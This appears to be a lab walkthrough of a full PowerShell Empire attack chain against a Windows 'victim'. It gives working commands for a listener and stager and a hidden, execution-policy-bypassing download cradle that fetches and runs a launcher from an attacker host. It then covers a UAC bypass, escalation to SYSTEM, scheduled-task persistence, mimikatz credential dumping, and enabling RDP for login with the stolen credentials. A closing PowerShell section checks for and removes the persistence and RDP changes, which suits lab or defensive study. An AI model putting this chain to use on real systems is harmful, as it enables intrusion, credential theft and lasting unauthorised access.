PowerShell Empire: common attack path in a lab test environment
./empire
1.) setup a listener
listeners
uselistener http
execute
2.) create a stager
usestager multi/launcher
set Listener http
set OutFile /launcher.ps1
execute
3.) set up a web server to serve the launcher (run it from the directory that contains launcher.ps1)
python -m SimpleHTTPServer 8000     (Python 2; on Python 3 use: python3 -m http.server 8000)
4.) infect victim
have the victim PC reach the attacker PC, download launcher.ps1 and execute it (e.g. with a PowerShell download cradle)
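The victim-side half of step 4, as an added example (not from the original notes or from the Empire project): a PowerShell download cradle that fetches launcher.ps1 from the web server started in step 3 and runs it in memory. The attacker address 10.0.0.5 is an assumed lab value; change it to match your setup.

```powershell
# Added example (not part of the original notes). Assumes the attacker box is
# 10.0.0.5 and is serving launcher.ps1 on port 8000 (step 3); adjust $Attacker.
$Attacker = 'http://10.0.0.5:8000'

# multi/launcher with OutFile writes a one-liner of the form
#   powershell -noP -sta -w 1 -enc <base64 stager>
# Pull it over HTTP and evaluate it in-process. Nothing is written to disk on
# the victim; the artifacts are the outbound HTTP request and the child
# powershell.exe that the one-liner spawns.
$launcher = (New-Object System.Net.WebClient).DownloadString("$Attacker/launcher.ps1")
Invoke-Expression $launcher

# Equivalent one-liner to paste into cmd.exe on the victim. -ExecutionPolicy Bypass
# only affects this process, so no machine-wide policy change is needed:
# powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/launcher.ps1'))"
```

The web server log from step 3 should show a GET for /launcher.ps1 a moment before the agent checks in to the listener; if the GET appears but no agent follows, the launcher ran but could not reach the listener's Host/Port.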
5.) interact with agent
** you should see the agent check in as soon as step #4 above is complete; the agents command lists it **
interact XXXXX      (agent name from the agents list)
rename victim
6.) see where you are
sysinfo
whoami
pwd
info (if high_integrity = 0 the agent is a regular medium-integrity user, if = 1 it is an elevated admin)
7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute
8.) if not admin, use a weakness to escalate (if the user is already in the Administrators group but running at medium integrity, a UAC bypass is enough; no real privilege escalation is needed)
usemodule privesc/bypassuac_env
set Listener http
execute
9.) interact with admin agent
** if it works, a new high-integrity agent should check in immediately after step #8 **
interact XXXX
rename victimAsAdmin
10.) see where you are
whoami
info (high_integrity should now be 1)
11.) if admin, move to SYSTEM
usemodule privesc/getsystem
execute
12.) see where you are
whoami (should now say NT AUTHORITY\SYSTEM)
13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2      (trigger the task after 2 minutes of user idle time)
execute
14.) run mimikatz (dumps logon credentials; needs the SYSTEM or high-integrity agent from step #11)
mimikatz
15.) enumerate credential store
usemodule credentials/enum_cred_store
execute
16.) enable remote desktop
usemodule management/enable_rdp
execute
17.) remote desktop into the victim from the attacker box with the credentials found in steps #14 and #15
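To confirm from the victim itself what the Empire steps above should have produced, here is an added PowerShell helper (not from the original notes and not part of Empire). Get-IntegrityContext reproduces the high_integrity distinction used in steps 6, 10 and 12 and flags the UAC case from step 8; Test-EmpireFootprint checks the scheduled-task persistence from step 13 and the RDP change from step 16; Remove-EmpireFootprint undoes those two changes when the lab run is over. The task name Updater and the registry path are Empire's schtasks module defaults; change the parameters if you set different options.

```powershell
# Added example (not part of the original notes or of Empire). Run from a
# PowerShell prompt on the victim; parameter defaults match Empire's
# persistence/userland/schtasks module options.

function Get-IntegrityContext {
    # Same distinction as Empire's 'info' high_integrity field: the current
    # token, not group membership, decides whether admin operations succeed.
    $id        = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($id)
    $adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator
    $inAdmins  = $id.Groups.Value -contains 'S-1-5-32-544'   # BUILTIN\Administrators SID
    $high      = $principal.IsInRole($adminRole)             # true only for an elevated token
    [pscustomobject]@{
        User           = $id.Name
        IsSystem       = $id.IsSystem
        HighIntegrity  = $high
        InAdminsGroup  = $inAdmins
        # In Administrators but running the UAC-filtered (medium) token: the
        # step 8 case where a bypassuac_* module is enough.
        NeedsUacBypass = ($inAdmins -and -not $high)
    }
}

function Test-EmpireFootprint {
    param(
        [string]$TaskName = 'Updater',
        [string]$RegPath  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Debug'
    )
    # Step 13: the schtasks module stores the stager as a registry value (the last
    # element of RegPath is the value name) and registers a task that reads it back.
    $keyPath   = Split-Path $RegPath -Parent
    $valueName = Split-Path $RegPath -Leaf
    $task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
    $blob = (Get-ItemProperty -Path $keyPath -Name $valueName -ErrorAction SilentlyContinue).$valueName

    # Step 16: enable_rdp clears fDenyTSConnections and enables the
    # "Remote Desktop" firewall rule group; 3389 should then be listening.
    $tsKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpDenied = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections
    $fwRules   = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue
    $listening = Get-NetTCPConnection -State Listen -LocalPort 3389 -ErrorAction SilentlyContinue

    [pscustomobject]@{
        TaskPresent       = [bool]$task
        TaskAction        = if ($task) { ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ' } else { $null }
        StagerInRegistry  = [bool]$blob
        StagerLength      = if ($blob) { $blob.Length } else { 0 }
        RdpEnabled        = ($rdpDenied -eq 0)
        RdpFirewallOpen   = [bool]($fwRules | Where-Object Enabled -eq 'True')
        Port3389Listening = [bool]$listening
    }
}

function Remove-EmpireFootprint {
    param(
        [string]$TaskName = 'Updater',
        [string]$RegPath  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Debug'
    )
    # Lab cleanup for steps 13 and 16. The task and registry value live in the
    # user's hive; reverting RDP needs an elevated prompt.
    Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false -ErrorAction SilentlyContinue
    Remove-ItemProperty -Path (Split-Path $RegPath -Parent) -Name (Split-Path $RegPath -Leaf) -ErrorAction SilentlyContinue
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 1
    Disable-NetFirewallRule -DisplayGroup 'Remote Desktop'
}

Get-IntegrityContext
Test-EmpireFootprint
```

Run Get-IntegrityContext in the same session type the agent is running as: a medium-integrity agent for an admin user shows InAdminsGroup true and HighIntegrity false, which is exactly when step 8's bypassuac_env applies, while a SYSTEM agent shows IsSystem true. Test-EmpireFootprint requires Windows 8 / Server 2012 or later for Get-ScheduledTask, Get-NetFirewallRule and Get-NetTCPConnection.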